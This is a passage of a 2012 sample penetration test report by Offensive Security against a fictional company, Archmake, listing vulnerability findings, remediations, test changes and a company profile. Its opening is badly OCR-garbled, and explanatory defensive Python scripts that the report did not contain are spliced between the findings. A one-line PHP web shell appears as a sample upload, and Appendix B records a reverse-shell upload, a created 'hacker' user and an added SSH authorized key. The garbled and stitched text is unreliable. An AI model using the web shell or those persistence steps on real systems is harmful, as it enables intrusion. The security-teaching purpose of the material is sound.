!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 26 of 32 8>>%*<1. 8H D0$*%5"#1$1+6 F%+"1$ "*< C1+1?"+1'* 71,9 7"+1*? 3/"$% ln accordance wlLh nlS1 S 800-30, dlscovered vulnerablllLles are ranked based upon llkellhood and lmpacL Lo deLermlne overall rlsk. @*>5'+%/+%< ;=I8<41* 8//%,, 8aLlng: ='MP AffecLed SysLem: www.Archmake.com uescrlpLlon: Access Lo Lhe www.Archmake.com admlnlsLraLlve lnLerface ls only proLecLed by a username and password comblnaLlon. lL ls suggesLed besL pracLlce Lo only allow speclflc hosLs access Lo any admlnlsLraLlve lnLerface. lmpacL: lf an aLLacker ls able Lo obLaln valld credenLlals or a valld sesslon Lo Lhe admlnlsLraLlve lnLerface, Lhere are no addlLlonal conLrols ln place Lo prevenL prlvllege escalaLlon. ln Lhe course of Lhls peneLraLlon LesL, addlLlonal layers of defense aL Lhls layer would have mlLlgaLed Lhe lnlLlally dlscovered fooLhold galned by Lhe aLLackers. 8emedlaLlon: lmplemenL conLrols Lo only allow connecLlons Lo Lhe admlnlsLraLlve lnLerface from known hosLs. A poLenLlal meLhod for achlevlng Lhls could be Lhrough only allowlng access from cllenLs LhaL are behlnd Lhe company vn or a whlLellsL of known LrusLed hosLs. D0$*%5"#$% ;'5<=5%,, 3%"5/G =$0?1* 8aLlng: ='MP AffecLed SysLem: www.Archmake.com uescrlpLlon: 1he www.Archmake.com sysLem ls operaLlng wlLh a vulnerable Wordress plugln (8elevanssl user Searches) LhaL lnLeracLs wlLh Lhe publlc search funcLlon of Lhe slLe. 1hls vulnerablllLy ls explolLed by sLorlng [avascrlpL, whlch ls Lhen execuLed as a sLored xSS vulnerablllLy. ubllc LxplolL: hLLp://www.explolL-db.com/explolLs/16233/ lmpacL: 1hls vulnerablllLy can be uLlllzed Lo obLaln a valld sesslon Lo Lhe Wordress admlnlsLraLlon lnLerface, provldlng Lhe aLLacker wlLh admlnlsLraLlve access of Lhe !898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.> 18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 27 of 32 overall sysLem. 
Remediation: Update the Relevanssi plugin to a version greater than 2.7.2.

Webserver bzip Vulnerability

Rating: HIGH
Affected System: www.Archmake.com
Description: The version of bzip2 running on the remote system is vulnerable to a race condition that, when properly exploited, results in arbitrary code execution.
Public Exploit: http://www.exploit-db.com/exploits/18147/
Impact: By utilizing a public exploit for this flaw, root-level privileges can be obtained.
Remediation: Apply vendor-supplied patches to update bzip2 to a version greater than 1.0.3-6.

Vulnerable Splunk Installation

Rating: HIGH
Affected System: 10.10.0.3
Description: The version of Splunk on the remote host is vulnerable to remote command injection.
Public Exploit: http://www.exploit-db.com/exploits/18243/
Impact: An unauthenticated remote user with access to the Splunk host can execute commands as the Local System user.
Remediation: Update the Splunk installation to version 4.2.3 or higher.

Hardcoded Username and Password in Executable

Rating: HIGH
Affected System: 10.10.0.3
Description: The exportcsv.exe application on the remote host was found to operate with database credentials hardcoded into the application.
Impact: By extracting the credentials from the application, direct connections to the database server were possible. The credentials had administrative-level access, which provides full control over the database contents. This has the effect of granting total control of the backend system to the attacker.
Remediation: Deploy interactive authentication as part of the application start-up process, so that no shared credential has to live inside the binary. Use unique username/password combinations for each entity that accesses the system. Create a whitelist of the least number of required commands that are permitted for each account.
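Credentials embedded in a Windows executable are usually recoverable with a strings pass, but .NET and Win32 wide-string literals are stored as UTF-16LE, which a naive ASCII-only pass does not decode. The following Python script is an added example, not part of this report and not Archmake's exportcsv.exe: it extracts both ASCII and UTF-16LE printable runs from a binary and flags anything shaped like a connection string or credential assignment. The sample binary bytes, the server address and the credential values are constructed for the example.

```python
"""Scan a binary for embedded credentials in ASCII and UTF-16LE strings."""
import re
import sys
from typing import List, Tuple

# Substrings that commonly betray an embedded connection string or credential.
# Constructed for this example; extend to match the products in your estate.
CREDENTIAL_PATTERNS = [
    re.compile(r"(?i)\b(?:password|pwd|passwd)\s*=\s*[^;\s]+"),
    re.compile(r"(?i)\b(?:user id|uid|username|user)\s*=\s*[^;\s]+"),
    re.compile(r"(?i)\b(?:data source|server|host)\s*=\s*[^;\s]+"),
    re.compile(r"(?i)\b(?:api[_-]?key|secret|token)\s*[:=]\s*\S+"),
]


def extract_strings(data: bytes, min_len: int = 6) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, text) for every printable run of at least min_len
    characters, both as plain ASCII and as UTF-16LE (one printable byte followed
    by a NUL, the layout of .NET and Win32 wide-string literals)."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(found)


def find_credentials(data: bytes) -> List[dict]:
    """Match every extracted string against the credential patterns."""
    hits = []
    for offset, enc, text in extract_strings(data):
        for pat in CREDENTIAL_PATTERNS:
            for m in pat.finditer(text):
                hits.append({"offset": offset, "encoding": enc, "match": m.group(0)})
    return hits


def build_sample_binary() -> bytes:
    """Constructed stand-in for a Windows executable: not a real PE file and not
    exportcsv.exe. The connection string is stored as UTF-16LE, as a .NET
    string literal would be."""
    filler = bytes(range(256)) * 4
    ascii_text = b"This program cannot be run in DOS mode.\r\n\x00\x00"
    conn = "Server=10.10.0.3;Database=orders;User Id=sa;Password=Hunter2!"
    return b"MZ" + filler + ascii_text + conn.encode("utf-16-le") + filler


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_binary()
    for hit in find_credentials(blob):
        print(f"{hit['offset']:#010x} {hit['encoding']:8} {hit['match']}")
```

Run it with a path to a binary to scan that file; without arguments it scans the constructed sample, where all three hits (server, user and password) are found only in the UTF-16LE pass. A clean result from a scanner like this is not proof of absence (credentials can be obfuscated or assembled at run time), but a hit is a defect regardless of how hard the binary is to reach.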
Database Unsalted Password Storage

Rating: HIGH
Affected System: 10.10.0.3
Description: Passwords stored on the database server were discovered to be unsalted [12].
Impact: Because the passwords were stored without salting, brute-force attacks against the system obtained the clear-text values with minimal effort. In this instance, it provided the attackers with the clear-text passwords of the vast majority of Archmake's customers, exposing them to the potential of future attacks.
Remediation: Store passwords as salted hashes, using a unique random salt per user and a deliberately slow password-hashing function (for example bcrypt, scrypt or PBKDF2) rather than a plain fast hash. Ensure that all appropriate measures are taken to secure sensitive data at rest.

Unprotected Database Server

Rating: HIGH
Affected System: 10.10.0.3
Description: The database server was found to be operating on a flat network, which allowed connections from the local LAN. Due to the sensitivity of this system, additional controls should be put into place to ensure its protection.
Impact: Once credentials to the database server were discovered, it was trivial to obtain full control over the system. This resulted in a much greater impact to the organization.
Remediation: Implement additional layers of defense for the database server. This may include moving the database server to a separate network and strictly controlling ingress and egress traffic to it.

Database Contains Unencrypted Credit Card Numbers

Rating: HIGH
Affected System: 10.10.0.3
[12] http://en.wikipedia.org/wiki/Salt_(cryptography)

Description: It was discovered that in the course of transaction processing, credit card numbers are stored in clear text on the database server for a brief period of time.
Impact: While the time that credit card numbers spend in the database is short, it was enough of an exposure to allow the attackers to obtain them on a consistent basis. This compromised the confidentiality of every credit card processed by the system.
Remediation: The design and architecture of the transaction processing system should be reviewed. This review will identify which additional controls should be put in place to better protect customer data.

Lack of Transaction Verification

Rating: HIGH
Affected System: 10.10.0.3
Description: No verification was in place to validate the source of transactions submitted to the database for processing.
Impact: By not validating the integrity of the submitted transactions, it was possible for the attackers to submit arbitrary transactions and have them processed by the system as if they were authentic. In the course of the penetration test, this vulnerability allowed refunds to be processed against attacker-supplied credit cards.
Remediation: Controls should be added to verify the origin and integrity of transactions before processing, for example a message authentication code over each transaction that the processing system checks before acting on it.

SSH Key Files not Password Protected

Rating: MEDIUM
Affected System: www.Archmake.com
Description: Once root privileges were obtained, it was possible to make use of the installed SSH key files, as they were not password protected. It is considered best practice to protect SSH key files through the use of passwords.
Impact: By utilizing the existing SSH key files and SSH tunnels, it was possible to remotely access the system without altering the root user's password.
This minimized the chances of being detected.
Remediation: Use passwords to protect all SSH key files.

Outbound Access from Webserver

Rating: MEDIUM
Affected System: www.Archmake.com
Description: The www.Archmake.com system was discovered to allow outbound connections to specific ports. While some filtering is in place, outbound connections to TCP port 33 were discovered to be open. Best practice is to permit only the traffic of externally initiated connections to valid server ports.
Impact: The permitted outbound connections were used to establish interactive access to the impacted system. If this were not allowed, the attacker's abilities would have been impaired.
Remediation: Employ egress filtering in the DMZ so that servers may initiate connections only to specific hosts on specific ports.

WordPress Upload Plugin Invalid File Type Checks

Rating: LOW
Affected System: www.Archmake.com
Description: The admin upload plugin implements file type checking in a manner that is ineffective.
Impact: The impact of this issue is low because only administrative users have access to this functionality. The flaw was utilized to ease transferring files to the impacted system; had it been corrected, alternative means of file transfer would have been used.
Remediation: Correct the file type checking, or disable the plugin if the functionality is not required.
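The unsalted password finding above turns on a cost asymmetry worth seeing in code. The following Python is an added example, not code from this report or from Archmake's systems: it stores a constructed three-customer table first the way it was found (an unsalted fast hash) and then the way the remediation asks for (a unique random salt per user and PBKDF2-HMAC-SHA256), and runs the same wordlist attack against both. The customer names, passwords and wordlist are constructed for the example.

```python
"""Unsalted fast hash vs salted slow KDF: why one table cracked most customers."""
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Constructed sample data: a tiny customer table and an attacker's wordlist.
CUSTOMERS = {"alice": "password", "bob": "Tr0ub4dor&3", "carol": "password"}
WORDLIST = ["123456", "password", "letmein"]


# --- Scheme as found: unsalted, fast hash ------------------------------------
def weak_hash(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def weak_store() -> Dict[str, str]:
    return {user: weak_hash(pw) for user, pw in CUSTOMERS.items()}


def weak_crack(stored: Dict[str, str], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """One table of len(wordlist) hashes is computed once and tried against every
    user with a dictionary lookup; users who share a password fall together."""
    table = {weak_hash(w): w for w in wordlist}
    recovered = {user: table[h] for user, h in stored.items() if h in table}
    return recovered, len(table)


# --- Remediation: unique random salt per user + deliberately slow KDF ---------
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; raise as hardware improves


def strong_hash(password: str, salt: Optional[bytes] = None) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password: str, record: str) -> bool:
    """Re-derive with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def strong_store() -> Dict[str, str]:
    return {user: strong_hash(pw) for user, pw in CUSTOMERS.items()}


def strong_crack(stored: Dict[str, str], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """No shared table is possible: every guess is re-derived per user at the KDF's cost."""
    recovered, kdf_calls = {}, 0
    for user, record in stored.items():
        for w in wordlist:
            kdf_calls += 1
            if verify(w, record):
                recovered[user] = w
                break
    return recovered, kdf_calls
```

Against the unsalted table the attacker computes three MD5 hashes, once, and reads two customers off it; the identical stored values also give away that alice and carol share a password before any cracking. Against the salted table the same attack needs seven PBKDF2 derivations of 600,000 iterations each, and the cost grows with the number of users rather than with the wordlist. Salting does not rescue customers who chose a wordlist password; the slow KDF is what makes each guess expensive, and it is the combination the remediation calls for.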
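For the Lack of Transaction Verification finding, the control the remediation describes is simplest to see with both sides of the exchange in one place. The following Python is an added example, not code from this report or from Archmake's order system: the submitting side attaches an HMAC-SHA256 tag over the fields an attacker would want to alter, and the processing side refuses anything unsigned, altered, stale or replayed before it touches the database. The key, the field names, the transaction values and the fixed clock are constructed for the example.

```python
"""Signed transaction submissions: the submitter authenticates each transaction and
the processing side refuses anything unsigned, altered, stale or replayed."""
import hashlib
import hmac
import json
from typing import Any, Dict, Set

# Shared secret between the submitting system and the processor. Constructed for
# this example; in production it comes from a secret store, not from a binary.
SHARED_KEY = b"constructed-demo-key-do-not-reuse"

# Fields covered by the MAC: anything an attacker could benefit from changing
# (transaction type, amount, destination card) must be in this list.
PROTECTED = ("txn_id", "type", "amount_cents", "card_token", "issued_at")


def canonical(txn: Dict[str, Any]) -> bytes:
    """Fixed-order, whitespace-free serialization so both sides MAC identical bytes."""
    return json.dumps({k: txn[k] for k in PROTECTED}, sort_keys=True,
                      separators=(",", ":")).encode()


def sign_transaction(txn: Dict[str, Any], key: bytes = SHARED_KEY) -> Dict[str, Any]:
    """Submitting side: attach an HMAC-SHA256 tag over the protected fields."""
    signed = dict(txn)
    signed["mac"] = hmac.new(key, canonical(txn), hashlib.sha256).hexdigest()
    return signed


class Processor:
    """Processing side: verify before anything is written to the database."""

    def __init__(self, key: bytes = SHARED_KEY, max_age_s: int = 300) -> None:
        self.key = key
        self.max_age_s = max_age_s
        self.seen: Set[str] = set()   # txn_ids already processed; persist in practice

    def verify(self, submission: Dict[str, Any], now: float) -> str:
        """Return 'ok' to process, otherwise the rejection reason."""
        if any(k not in submission for k in PROTECTED + ("mac",)):
            return "rejected: missing field"
        expected = hmac.new(self.key, canonical(submission), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(submission["mac"])):
            return "rejected: bad mac"          # forged, or altered after signing
        if abs(now - submission["issued_at"]) > self.max_age_s:
            return "rejected: stale"            # outside the accepted time window
        if submission["txn_id"] in self.seen:
            return "rejected: replay"           # same signed message submitted twice
        self.seen.add(submission["txn_id"])
        return "ok"


# Constructed sample exchange ---------------------------------------------------
NOW = 1_330_000_000  # fixed clock for the example


def sample_refund() -> Dict[str, Any]:
    return {"txn_id": "R-0001", "type": "refund", "amount_cents": 4999,
            "card_token": "tok_customer_7f3a", "issued_at": NOW}


def run_exchange() -> Dict[str, str]:
    proc = Processor()
    results = {}
    legit = sign_transaction(sample_refund())
    results["legit"] = proc.verify(legit, NOW + 5)
    results["replay"] = proc.verify(legit, NOW + 10)
    redirected = dict(legit, card_token="tok_attacker_0bad")      # MAC no longer matches
    results["redirected"] = proc.verify(redirected, NOW + 5)
    forged = sign_transaction(dict(sample_refund(), txn_id="R-0002"), key=b"guess")
    results["forged"] = proc.verify(forged, NOW + 5)
    unsigned = dict(sample_refund(), txn_id="R-0003")            # arbitrary submission
    results["unsigned"] = proc.verify(unsigned, NOW + 5)
    stale = sign_transaction(dict(sample_refund(), txn_id="R-0004"))
    results["stale"] = proc.verify(stale, NOW + 3600)
    return results
```

The exchange covers the case from the finding (an arbitrary refund with no signature) and the cases an attacker reaches for once signing exists: moving a legitimately signed refund to another card, signing with a guessed key, and resubmitting a captured message. The MAC is checked first and in constant time, the window and the seen-set handle replay, and the key must not be reachable from other LAN hosts, which ties this finding to the Unprotected Database Server and hardcoded-credential findings above.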
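Whether an SSH private key carries a passphrase can be read off the file without trying to use it, which makes the SSH Key Files finding straightforward to audit across a fleet. The following Python is an added example, not code from this report: it recognises the two on-disk formats (the openssh-key-v1 envelope, whose cipher and KDF names sit in the clear at the front of the blob, and legacy PEM, which announces encryption with a Proc-Type header) and lists the private keys that have none. The directory contents are constructed fixtures with dummy key material, standing in for the web server's /root/.ssh.

```python
"""Flag private keys in an ssh directory that carry no passphrase."""
import base64
from typing import Dict, List, Optional, Tuple

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(blob: bytes, pos: int) -> Tuple[bytes, int]:
    """Read one SSH wire-format string (uint32 big-endian length, then bytes)."""
    if pos + 4 > len(blob):
        raise ValueError("truncated openssh key blob")
    length = int.from_bytes(blob[pos:pos + 4], "big")
    if pos + 4 + length > len(blob):
        raise ValueError("truncated openssh key blob")
    return blob[pos + 4:pos + 4 + length], pos + 4 + length


def key_is_encrypted(text: str) -> Optional[bool]:
    """True if the private key needs a passphrase, False if it does not,
    None if the text is not a private key (public key, known_hosts, ...)."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN ") or "PRIVATE KEY" not in lines[0]:
        return None
    header = lines[0]
    if "OPENSSH PRIVATE KEY" in header:
        # New format: ciphername and kdfname are the first two strings after the magic.
        payload = "".join(l for l in lines[1:] if not l.startswith("-----"))
        blob = base64.b64decode(payload)
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        ciphername, pos = _read_string(blob, len(OPENSSH_MAGIC))
        kdfname, _ = _read_string(blob, pos)
        return ciphername != b"none" and kdfname != b"none"
    if "ENCRYPTED PRIVATE KEY" in header:     # PKCS#8 with password-based encryption
        return True
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is announced by a header line.
    return any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines[1:])


def find_unprotected_keys(files: Dict[str, str]) -> List[str]:
    """Return the paths whose contents are private keys without a passphrase."""
    return sorted(path for path, text in files.items() if key_is_encrypted(text) is False)


# --- Constructed fixtures (dummy key material, not real keys) --------------------
def _ssh_string(b: bytes) -> bytes:
    return len(b).to_bytes(4, "big") + b


def make_openssh_key(ciphername: bytes, kdfname: bytes) -> str:
    """Build a structurally valid openssh-key-v1 envelope around zeroed key material."""
    blob = (OPENSSH_MAGIC + _ssh_string(ciphername) + _ssh_string(kdfname)
            + _ssh_string(b"") + (1).to_bytes(4, "big")
            + _ssh_string(b"\x00" * 51) + _ssh_string(b"\x00" * 136))
    body = base64.encodebytes(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}-----END OPENSSH PRIVATE KEY-----\n"


LEGACY_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                    "AAAA\n-----END RSA PRIVATE KEY-----\n")
LEGACY_PLAIN = "-----BEGIN RSA PRIVATE KEY-----\nAAAA\n-----END RSA PRIVATE KEY-----\n"
PUBLIC_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLE root@www\n"

SAMPLE_SSH_DIR = {   # constructed stand-in for /root/.ssh on the web server
    "/root/.ssh/id_rsa": LEGACY_PLAIN,
    "/root/.ssh/id_rsa.pub": PUBLIC_KEY,
    "/root/.ssh/id_ed25519": make_openssh_key(b"none", b"none"),
    "/root/.ssh/backup_key": make_openssh_key(b"aes256-ctr", b"bcrypt"),
    "/root/.ssh/old_key": LEGACY_ENCRYPTED,
}
```

On the constructed directory the scan reports id_ed25519 and id_rsa. An existing key is given a passphrase in place with `ssh-keygen -p -f <keyfile>`; the check above is then re-run to confirm. Since Appendix B records that the testers also added their own key to /root/.ssh/authorized_keys, an audit of the same directory should review that file as well.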
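Appendix B shows what the ineffective file type check let through: a file named php-reverse-shell.png.php, which a check that looks for an image extension anywhere in the name accepts. The report does not describe the plugin's actual logic, so the weak check below is an assumption in that spirit; the rest of the following Python is an added example, not code from this report or from the WordPress plugin, of what an upload handler should do instead. The sample uploads are constructed.

```python
"""Final-extension allowlist plus content check for an admin upload handler."""
import os
import secrets
from typing import Optional

# Permitted image types and the leading bytes a genuine file of that type carries.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


def weak_is_allowed(filename: str) -> bool:
    """Assumed check in the spirit of the finding: passes if an image extension
    appears anywhere in the name, so 'php-reverse-shell.png.php' is accepted."""
    name = filename.lower()
    return any(ext in name for ext in ALLOWED_TYPES)


def strong_is_allowed(filename: str, content: bytes) -> bool:
    """Only the final extension counts, it must be on the allowlist, and the body
    must begin like the type it claims to be."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_TYPES:
        return False
    return any(content.startswith(magic) for magic in ALLOWED_TYPES[ext])


def stored_name(filename: str, content: bytes) -> Optional[str]:
    """Server-chosen name under which an accepted upload is saved; None if rejected.
    The user-supplied name never reaches the filesystem."""
    if not strong_is_allowed(filename, content):
        return None
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


# Constructed sample uploads
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP = b"<?php system($_GET['cmd']); ?>"
```

The hardened check rejects the double extension, a null-byte name such as shell.php\0.png, a dotfile like .htaccess, and an image name whose body is PHP; what it accepts is saved under a random name with an allowlisted extension. The magic-byte test is a sanity check, not a parser: a real PNG with PHP appended still passes, so the upload directory must additionally be configured never to execute scripts.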
Appendix B: List of Changes made to Archmake Systems

The following files were altered or created as part of this penetration test. Specific details of how and why these files were altered are included in the Attack Narrative.

www.Archmake.com:
- /root/.ssh/authorized_keys
- Files uploaded into /var/www/wp-content/uploads:
  o face.png
  o php-reverse-shell.png.php
  o race.png

10.10.0.3:
- All files located in C:\Users\hacker\Downloads

Windows domain:
- "hacker" user created
Appendix C: About Offensive Security

Offensive Security advocates penetration testing for impact as opposed to penetration testing for coverage. Penetration testing for coverage has risen in popularity in recent years as a simplified method for companies to meet regulatory needs. As a form of vulnerability scanning, penetration testing for coverage includes selective verification of discovered issues through exploitation. This allows service providers to conduct the work largely through the use of automated toolsets and to maintain consistency of product across multiple engagements.

Penetration testing for impact is a form of attack simulation under controlled conditions. This more closely mimics the real-world, targeted attack threat that organizations face on a day-to-day basis. Penetration testing for impact is a goal-based assessment that, rather than producing a simple vulnerability inventory, establishes the true business impact of a breach. An impact-based penetration test identifies the areas for improvement that will yield the highest rate of return for the business.

Penetration testing for impact poses the challenge of requiring a high skill set to complete successfully. As demonstrated in this sample report, Offensive Security believes that it is uniquely qualified to deliver world-class results when conducting penetration tests for impact, due to the level of expertise found within our team of security professionals. Offensive Security does not maintain a separate team for penetration testing and the other activities in which the company is engaged. This means that the same individuals involved in Offensive Security's industry-leading performance-based training, in the production of industry-standard tools such as BackTrack Linux, in authoring best-selling books, and in maintaining industry references such as Exploit-DB are the individuals involved in the delivery of services.

Offensive Security offers a product that cannot be matched in the current market. However, we may not be the right fit for every job. Offensive Security typically conducts consulting services at a low-volume, high-skill ratio to allow Offensive Security staff to mimic real-world situations more closely. This also gives customers increased access to industry-recognized expertise while keeping costs reasonable. As such, high-volume, fast-turnaround engagements are often not a good fit. Offensive Security is focused on conducting high-quality, high-impact assessments and is actively sought out by customers in need of services that cannot be delivered by other vendors. If you would like to discuss your penetration testing needs, please contact us at info@offsec.com.